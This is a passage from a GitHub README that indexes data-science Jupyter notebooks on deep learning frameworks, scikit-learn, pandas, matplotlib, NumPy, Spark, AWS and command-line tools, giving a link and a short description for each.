<br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/README_1200x800.gif"> </p> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/coversmall_alt.png"> <br/> </p> # data-science-ipython-notebooks ## Index * [deep-learning](#deep-learning) * [tensorflow](#tensor-flow-tutorials) * [theano](#theano-tutorials) * [keras](#keras-tutorials) * [caffe](#deep-learning-misc) * [scikit-learn](#scikit-learn) * [statistical-inference-scipy](#statistical-inference-scipy) * [pandas](#pandas) * [matplotlib](#matplotlib) * [numpy](#numpy) * [python-data](#python-data) * [kaggle-and-business-analyses](#kaggle-and-business-analyses) * [spark](#spark) * [mapreduce-python](#mapreduce-python) * [amazon web services](#aws) * [command lines](#commands) * [misc](#misc) * [notebook-installation](#notebook-installation) * [credits](#credits) * [contributing](#contributing) * [contact-info](#contact-info) * [license](#license) <br/> <p align="center"> <img src="http://i.imgur.com/ZhKXrKZ.png"> </p> ## deep-learning IPython Notebook(s) demonstrating deep learning functionality. <br/> <p align="center"> <img src="https://avatars0.githubusercontent.com/u/15658638?v=3&s=100"> </p> ### tensor-flow-tutorials Additional TensorFlow tutorials: * [pkmital/tensorflow_tutorials](https://github.com/pkmital/tensorflow_tutorials) * [nlintz/TensorFlow-Tutorials](https://github.com/nlintz/TensorFlow-Tutorials) * [alrojo/tensorflow-tutorial](https://github.com/alrojo/tensorflow-tutorial) * [BinRoot/TensorFlow-Book](https://github.com/BinRoot/TensorFlow-Book) * [tuanavu/tensorflow-basic-tutorials](https://github.com/tuanavu/tensorflow-basic-tutorials) | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [tsf-basics](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/1_intro/basic_operations.ipynb) | Learn basic operations in TensorFlow, a library for various kinds of perceptual and language understanding tasks from Google. | | [tsf-linear](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/2_basic_classifiers/linear_regression.ipynb) | Implement linear regression in TensorFlow. | | [tsf-logistic](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/2_basic_classifiers/logistic_regression.ipynb) | Implement logistic regression in TensorFlow. | | [tsf-nn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/2_basic_classifiers/nearest_neighbor.ipynb) | Implement nearest neighboars in TensorFlow. | | [tsf-alex](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/alexnet.ipynb) | Implement AlexNet in TensorFlow. | | [tsf-cnn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/convolutional_network.ipynb) | Implement convolutional neural networks in TensorFlow. | | [tsf-mlp](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/multilayer_perceptron.ipynb) | Implement multilayer perceptrons in TensorFlow. | | [tsf-rnn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/3_neural_networks/recurrent_network.ipynb) | Implement recurrent neural networks in TensorFlow. | | [tsf-gpu](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/4_multi_gpu/multigpu_basics.ipynb) | Learn about basic multi-GPU computation in TensorFlow. | | [tsf-gviz](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/5_ui/graph_visualization.ipynb) | Learn about graph visualization in TensorFlow. | | [tsf-lviz](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-examples/notebooks/5_ui/loss_visualization.ipynb) | Learn about loss visualization in TensorFlow. | ### tensor-flow-exercises | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [tsf-not-mnist](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/1_notmnist.ipynb) | Learn simple data curation by creating a pickle with formatted datasets for training, development and testing in TensorFlow. | | [tsf-fully-connected](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/2_fullyconnected.ipynb) | Progressively train deeper and more accurate models using logistic regression and neural networks in TensorFlow. | | [tsf-regularization](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/3_regularization.ipynb) | Explore regularization techniques by training fully connected networks to classify notMNIST characters in TensorFlow. | | [tsf-convolutions](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/4_convolutions.ipynb) | Create convolutional neural networks in TensorFlow. | | [tsf-word2vec](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/5_word2vec.ipynb) | Train a skip-gram model over Text8 data in TensorFlow. | | [tsf-lstm](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/tensor-flow-exercises/6_lstm.ipynb) | Train a LSTM character model over Text8 data in TensorFlow. | <br/> <p align="center"> <img src="http://www.deeplearning.net/software/theano/_static/theano_logo_allblue_200x46.png"> </p> ### theano-tutorials | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [theano-intro](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/intro_theano/intro_theano.ipynb) | Intro to Theano, which allows you to define, optimize, and evaluate mathematical expressions involving multi-dimensional arrays efficiently. It can use GPUs and perform efficient symbolic differentiation. | | [theano-scan](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/scan_tutorial/scan_tutorial.ipynb) | Learn scans, a mechanism to perform loops in a Theano graph. | | [theano-logistic](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/intro_theano/logistic_regression.ipynb) | Implement logistic regression in Theano. | | [theano-rnn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/rnn_tutorial/simple_rnn.ipynb) | Implement recurrent neural networks in Theano. | | [theano-mlp](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/theano-tutorial/theano_mlp/theano_mlp.ipynb) | Implement multilayer perceptrons in Theano. | <br/> <p align="center"> <img src="http://i.imgur.com/L45Q8c2.jpg"> </p> ### keras-tutorials | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | keras | Keras is an open source neural network library written in Python. It is capable of running on top of either Tensorflow or Theano. | | [setup](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/0.%20Preamble.ipynb) | Learn about the tutorial goals and how to set up your Keras environment. | | [intro-deep-learning-ann](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.1%20Introduction%20-%20Deep%20Learning%20and%20ANN.ipynb) | Get an intro to deep learning with Keras and Artificial Neural Networks (ANN). | | [theano](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.2%20Introduction%20-%20Theano.ipynb) | Learn about Theano by working with weights matrices and gradients. | | [keras-otto](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.3%20Introduction%20-%20Keras.ipynb) | Learn about Keras by looking at the Kaggle Otto challenge. | | [ann-mnist](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/1.4%20%28Extra%29%20A%20Simple%20Implementation%20of%20ANN%20for%20MNIST.ipynb) | Review a simple implementation of ANN for MNIST using Keras. | | [conv-nets](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.1%20Supervised%20Learning%20-%20ConvNets.ipynb) | Learn about Convolutional Neural Networks (CNNs) with Keras. | | [conv-net-1](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.2.1%20Supervised%20Learning%20-%20ConvNet%20HandsOn%20Part%20I.ipynb) | Recognize handwritten digits from MNIST using Keras - Part 1. | | [conv-net-2](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.2.2%20Supervised%20Learning%20-%20ConvNet%20HandsOn%20Part%20II.ipynb) | Recognize handwritten digits from MNIST using Keras - Part 2. | | [keras-models](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/2.3%20Supervised%20Learning%20-%20Famous%20Models%20with%20Keras.ipynb) | Use pre-trained models such as VGG16, VGG19, ResNet50, and Inception v3 with Keras. | | [auto-encoders](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/3.1%20Unsupervised%20Learning%20-%20AutoEncoders%20and%20Embeddings.ipynb) | Learn about Autoencoders with Keras. | | [rnn-lstm](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/3.2%20RNN%20and%20LSTM.ipynb) | Learn about Recurrent Neural Networks (RNNs) with Keras. | | [lstm-sentence-gen](https://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/keras-tutorial/3.3%20%28Extra%29%20LSTM%20for%20Sentence%20Generation.ipynb) | Learn about RNNs using Long Short Term Memory (LSTM) networks with Keras. | ### deep-learning-misc | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [deep-dream](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/deep-learning/deep-dream/dream.ipynb) | Caffe-based computer vision program which uses a convolutional neural network to find and enhance patterns in images. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/scikitlearn.png"> </p> ## scikit-learn IPython Notebook(s) demonstrating scikit-learn functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [intro](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-intro.ipynb) | Intro notebook to scikit-learn. Scikit-learn adds Python support for large, multi-dimensional arrays and matrices, along with a large library of high-level mathematical functions to operate on these arrays. | | [knn](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-intro.ipynb#K-Nearest-Neighbors-Classifier) | Implement k-nearest neighbors in scikit-learn. | | [linear-reg](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-linear-reg.ipynb) | Implement linear regression in scikit-learn. | | [svm](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-svm.ipynb) | Implement support vector machine classifiers with and without kernels in scikit-learn. | | [random-forest](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-random-forest.ipynb) | Implement random forest classifiers and regressors in scikit-learn. | | [k-means](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-k-means.ipynb) | Implement k-means clustering in scikit-learn. | | [pca](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-pca.ipynb) | Implement principal component analysis in scikit-learn. | | [gmm](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-gmm.ipynb) | Implement Gaussian mixture models in scikit-learn. | | [validation](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scikit-learn/scikit-learn-validation.ipynb) | Implement validation and model selection in scikit-learn. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/scipy.png"> </p> ## statistical-inference-scipy IPython Notebook(s) demonstrating statistical inference with SciPy functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | scipy | SciPy is a collection of mathematical algorithms and convenience functions built on the Numpy extension of Python. It adds significant power to the interactive Python session by providing the user with high-level commands and classes for manipulating and visualizing data. | | [effect-size](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scipy/effect_size.ipynb) | Explore statistics that quantify effect size by analyzing the difference in height between men and women. Uses data from the Behavioral Risk Factor Surveillance System (BRFSS) to estimate the mean and standard deviation of height for adult women and men in the United States. | | [sampling](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scipy/sampling.ipynb) | Explore random sampling by analyzing the average weight of men and women in the United States using BRFSS data. | | [hypothesis](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/scipy/hypothesis.ipynb) | Explore hypothesis testing by analyzing the difference of first-born babies compared with others. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/pandas.png"> </p> ## pandas IPython Notebook(s) demonstrating pandas functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------| | [pandas](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/pandas.ipynb) | Software library written for data manipulation and analysis in Python. Offers data structures and operations for manipulating numerical tables and time series. | | [github-data-wrangling](https://github.com/donnemartin/viz/blob/master/githubstats/data_wrangling.ipynb) | Learn how to load, clean, merge, and feature engineer by analyzing GitHub data from the [`Viz`](https://github.com/donnemartin/viz) repo. | | [Introduction-to-Pandas](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.00-Introduction-to-Pandas.ipynb) | Introduction to Pandas. | | [Introducing-Pandas-Objects](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.01-Introducing-Pandas-Objects.ipynb) | Learn about Pandas objects. | | [Data Indexing and Selection](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.02-Data-Indexing-and-Selection.ipynb) | Learn about data indexing and selection in Pandas. | | [Operations-in-Pandas](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.03-Operations-in-Pandas.ipynb) | Learn about operating on data in Pandas. | | [Missing-Values](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.04-Missing-Values.ipynb) | Learn about handling missing data in Pandas. | | [Hierarchical-Indexing](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.05-Hierarchical-Indexing.ipynb) | Learn about hierarchical indexing in Pandas. | | [Concat-And-Append](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.06-Concat-And-Append.ipynb) | Learn about combining datasets: concat and append in Pandas. | | [Merge-and-Join](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.07-Merge-and-Join.ipynb) | Learn about combining datasets: merge and join in Pandas. | | [Aggregation-and-Grouping](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.08-Aggregation-and-Grouping.ipynb) | Learn about aggregation and grouping in Pandas. | | [Pivot-Tables](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.09-Pivot-Tables.ipynb) | Learn about pivot tables in Pandas. | | [Working-With-Strings](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.10-Working-With-Strings.ipynb) | Learn about vectorized string operations in Pandas. | | [Working-with-Time-Series](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.11-Working-with-Time-Series.ipynb) | Learn about working with time series in pandas. | | [Performance-Eval-and-Query](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/pandas/03.12-Performance-Eval-and-Query.ipynb) | Learn about high-performance Pandas: eval() and query() in Pandas. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/matplotlib.png"> </p> ## matplotlib IPython Notebook(s) demonstrating matplotlib functionality. | Notebook | Description | |-----------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------| | [matplotlib](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/matplotlib.ipynb) | Python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms. | | [matplotlib-applied](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/matplotlib-applied.ipynb) | Apply matplotlib visualizations to Kaggle competitions for exploratory data analysis. Learn how to create bar plots, histograms, subplot2grid, normalized plots, scatter plots, subplots, and kernel density estimation plots. | | [Introduction-To-Matplotlib](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.00-Introduction-To-Matplotlib.ipynb) | Introduction to Matplotlib. | | [Simple-Line-Plots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.01-Simple-Line-Plots.ipynb) | Learn about simple line plots in Matplotlib. | | [Simple-Scatter-Plots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.02-Simple-Scatter-Plots.ipynb) | Learn about simple scatter plots in Matplotlib. | | [Errorbars.ipynb](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.03-Errorbars.ipynb) | Learn about visualizing errors in Matplotlib. | | [Density-and-Contour-Plots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.04-Density-and-Contour-Plots.ipynb) | Learn about density and contour plots in Matplotlib. | | [Histograms-and-Binnings](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.05-Histograms-and-Binnings.ipynb) | Learn about histograms, binnings, and density in Matplotlib. | | [Customizing-Legends](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.06-Customizing-Legends.ipynb) | Learn about customizing plot legends in Matplotlib. | | [Customizing-Colorbars](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.07-Customizing-Colorbars.ipynb) | Learn about customizing colorbars in Matplotlib. | | [Multiple-Subplots](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.08-Multiple-Subplots.ipynb) | Learn about multiple subplots in Matplotlib. | | [Text-and-Annotation](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.09-Text-and-Annotation.ipynb) | Learn about text and annotation in Matplotlib. | | [Customizing-Ticks](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.10-Customizing-Ticks.ipynb) | Learn about customizing ticks in Matplotlib. | | [Settings-and-Stylesheets](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.11-Settings-and-Stylesheets.ipynb) | Learn about customizing Matplotlib: configurations and stylesheets. | | [Three-Dimensional-Plotting](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.12-Three-Dimensional-Plotting.ipynb) | Learn about three-dimensional plotting in Matplotlib. | | [Geographic-Data-With-Basemap](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.13-Geographic-Data-With-Basemap.ipynb) | Learn about geographic data with basemap in Matplotlib. | | [Visualization-With-Seaborn](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/matplotlib/04.14-Visualization-With-Seaborn.ipynb) | Learn about visualization with Seaborn. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/numpy.png"> </p> ## numpy IPython Notebook(s) demonstrating NumPy functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [numpy](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/numpy.ipynb) | Adds Python support for large, multi-dimensional arrays and matrices, along with a large library of high-level mathematical functions to operate on these arrays. | | [Introduction-to-NumPy](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.00-Introduction-to-NumPy.ipynb) | Introduction to NumPy. | | [Understanding-Data-Types](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.01-Understanding-Data-Types.ipynb) | Learn about data types in Python. | | [The-Basics-Of-NumPy-Arrays](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.02-The-Basics-Of-NumPy-Arrays.ipynb) | Learn about the basics of NumPy arrays. | | [Computation-on-arrays-ufuncs](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.03-Computation-on-arrays-ufuncs.ipynb) | Learn about computations on NumPy arrays: universal functions. | | [Computation-on-arrays-aggregates](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.04-Computation-on-arrays-aggregates.ipynb) | Learn about aggregations: min, max, and everything in between in NumPy. | | [Computation-on-arrays-broadcasting](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.05-Computation-on-arrays-broadcasting.ipynb) | Learn about computation on arrays: broadcasting in NumPy. | | [Boolean-Arrays-and-Masks](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.06-Boolean-Arrays-and-Masks.ipynb) | Learn about comparisons, masks, and boolean logic in NumPy. | | [Fancy-Indexing](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.07-Fancy-Indexing.ipynb) | Learn about fancy indexing in NumPy. | | [Sorting](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.08-Sorting.ipynb) | Learn about sorting arrays in NumPy. | | [Structured-Data-NumPy](http://nbviewer.jupyter.org/github/donnemartin/data-science-ipython-notebooks/blob/master/numpy/02.09-Structured-Data-NumPy.ipynb) | Learn about structured data: NumPy's structured arrays. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/python.png"> </p> ## python-data IPython Notebook(s) demonstrating Python functionality geared towards data analysis. | Notebook | Description | |-----------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------| | [data structures](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/structs.ipynb) | Learn Python basics with tuples, lists, dicts, sets. | | [data structure utilities](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/structs_utils.ipynb) | Learn Python operations such as slice, range, xrange, bisect, sort, sorted, reversed, enumerate, zip, list comprehensions. | | [functions](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/functions.ipynb) | Learn about more advanced Python features: Functions as objects, lambda functions, closures, *args, **kwargs currying, generators, generator expressions, itertools. | | [datetime](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/datetime.ipynb) | Learn how to work with Python dates and times: datetime, strftime, strptime, timedelta. | | [logging](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/logs.ipynb) | Learn about Python logging with RotatingFileHandler and TimedRotatingFileHandler. | | [pdb](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/pdb.ipynb) | Learn how to debug in Python with the interactive source code debugger. | | [unit tests](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/python-data/unit_tests.ipynb) | Learn how to test in Python with Nose unit tests. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/kaggle.png"> </p> ## kaggle-and-business-analyses IPython Notebook(s) used in [kaggle](https://www.kaggle.com/) competitions and business analyses. | Notebook | Description | |-------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------| | [titanic](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/kaggle/titanic.ipynb) | Predict survival on the Titanic. Learn data cleaning, exploratory data analysis, and machine learning. | | [churn-analysis](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/analyses/churn.ipynb) | Predict customer churn. Exercise logistic regression, gradient boosting classifers, support vector machines, random forests, and k-nearest-neighbors. Includes discussions of confusion matrices, ROC plots, feature importances, prediction probabilities, and calibration/descrimination.| <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/spark.png"> </p> ## spark IPython Notebook(s) demonstrating spark and HDFS functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------| | [spark](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/spark/spark.ipynb) | In-memory cluster computing framework, up to 100 times faster for certain applications and is well suited for machine learning algorithms. | | [hdfs](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/spark/hdfs.ipynb) | Reliably stores very large files across machines in a large cluster. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/mrjob.png"> </p> ## mapreduce-python IPython Notebook(s) demonstrating Hadoop MapReduce with mrjob functionality. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------| | [mapreduce-python](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/mapreduce/mapreduce-python.ipynb) | Runs MapReduce jobs in Python, executing jobs locally or on Hadoop clusters. Demonstrates Hadoop Streaming in Python code with unit test and [mrjob](https://github.com/Yelp/mrjob) config file to analyze Amazon S3 bucket logs on Elastic MapReduce. [Disco](https://github.com/discoproject/disco/) is another python-based alternative.| <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/aws.png"> </p> ## aws IPython Notebook(s) demonstrating Amazon Web Services (AWS) and AWS tools functionality. Also check out: * [SAWS](https://github.com/donnemartin/saws): A Supercharged AWS command line interface (CLI). * [Awesome AWS](https://github.com/donnemartin/awesome-aws): A curated list of libraries, open source repos, guides, blogs, and other resources. | Notebook | Description | |------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [boto](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#Boto) | Official AWS SDK for Python. | | [s3cmd](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#s3cmd) | Interacts with S3 through the command line. | | [s3distcp](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#s3distcp) | Combines smaller files and aggregates them together by taking in a pattern and target file. S3DistCp can also be used to transfer large volumes of data from S3 to your Hadoop cluster. | | [s3-parallel-put](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#s3-parallel-put) | Uploads multiple files to S3 in parallel. | | [redshift](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#redshift) | Acts as a fast data warehouse built on top of technology from massive parallel processing (MPP). | | [kinesis](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#kinesis) | Streams data in real time with the ability to process thousands of data streams per second. | | [lambda](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/aws/aws.ipynb#lambda) | Runs code in response to events, automatically managing compute resources. | <br/> <p align="center"> <img src="https://raw.githubusercontent.com/donnemartin/data-science-ipython-notebooks/master/images/commands.png"> </p> ## commands IPython Notebook(s) demonstrating various command lines for Linux, Git, etc. | Notebook | Description | |--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | [linux](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/linux.ipynb) | Unix-like and mostly POSIX-compliant computer operating system. Disk usage, splitting files, grep, sed, curl, viewing running processes, terminal syntax highlighting, and Vim.| | [anaconda](http://nbviewer.ipython.org/github/donnemartin/data-science-ipython-notebooks/blob/master/commands/misc.ipynb#anaconda) | Distribution 